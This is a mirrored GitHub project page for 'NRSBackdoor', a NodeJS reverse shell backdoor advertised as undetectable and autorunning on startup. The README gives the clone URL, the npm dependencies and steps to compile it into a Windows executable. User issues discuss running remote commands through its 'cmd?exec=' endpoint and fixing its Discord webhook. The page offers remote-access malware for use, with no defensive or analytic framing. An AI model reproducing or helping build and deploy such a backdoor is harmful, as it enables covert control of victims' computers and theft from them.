Git Product home page Git Product logo

nrsbackdoor's Introduction

NRSBackdoor

100% Undetectable NodeJS reverse shell backdoor that autoruns on startup

Installation

Github:

git clone https://github.com/I2rys/NRSBackdoor

NPM Packages:

npm i express-param && npm i localtunnel && npm i simple-exec && npm i discord.js && npm i express && npm i os

Build

  1. Install pkg.

    npm i pkg -g

  2. Compile index.js to an exe file using pkg, for more information visit me.

    pkg index.js

Note

For more information please read README.txt

License

MIT © I2rys

nrsbackdoor's People

Contributors

i2rys avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar

nrsbackdoor's Issues

cant get it to run

hey I cant get the program to run, I followed all the instructions and also updated node and npm. when I try to run it on visual studios it gives me this " crbug/1173575, non-JS module files deprecated" and on the browser it just says this site cant be reached and the error is "ERR_CONNECTION_REFUSED" if I run it as an exe file it just opens and closes cmd

thank you in advance

Browse dirs

Is there any way to browse through directories? I've tried cmd?exec=cd+.. and cmd?exec=cd .. , but they aren't working

btw I found a problem in your code making it a problem to send webhook. Webhook info should be like this:

const data = {
    id: 'webhook_id',
    token: 'webhook_token'
}
//Variables
const Webhook = new Discord.WebhookClient(data)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.